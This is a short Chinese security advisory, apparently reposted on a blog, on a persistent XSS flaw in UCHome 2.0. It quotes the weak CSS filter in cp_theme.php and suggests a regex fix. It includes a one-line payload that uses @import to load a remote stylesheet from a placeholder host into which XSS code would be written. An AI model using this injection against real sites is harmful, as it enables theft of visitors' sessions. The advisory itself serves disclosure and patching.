• uchome 2.0 存在持久XSS漏洞


    发布时间2010-09-03

    影响版本uchome 2.0

    漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

    测试方法

    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.

    @import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.

    分析代码 cp_theme.php 92行(17行调用)

    function checksecurity($str) {
    
    	//执行一系列的过滤验证是否合法的CSS
    	$filter = array(
    		'//*[
    
    ]*(.+?)[
    
    ]**//is',
    		'/[^a-z0-9]+/i',
    	);
    
    	$str = preg_replace($filter, '', $str); //过滤是过滤了,但只用于判断,没对源输入起作用
    
    	if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进行检测
    		showmessage('css_contains_elements_of_insecurity');
    	}
    
    	return true;
    }

    安全建议:

    临时解决方法

    implode应该是import的笔误

    /(expression|vbscript|javascript|import)/i

  • 相关阅读:
    1.28
    1.27
    1.26
    如果给你以下功能怎么测试
    测试面试题
    对h5页面的测试方式
    完美解决linux下Django报错Error: That port is already in use.
    KeyError:使用Python的Appium中的“ touchAction” 错误码
    Appium自动化测试
    selenium IDE使用
  • 原文地址:https://www.cnblogs.com/52php/p/5658205.html
Copyright © 2020-2023  润新知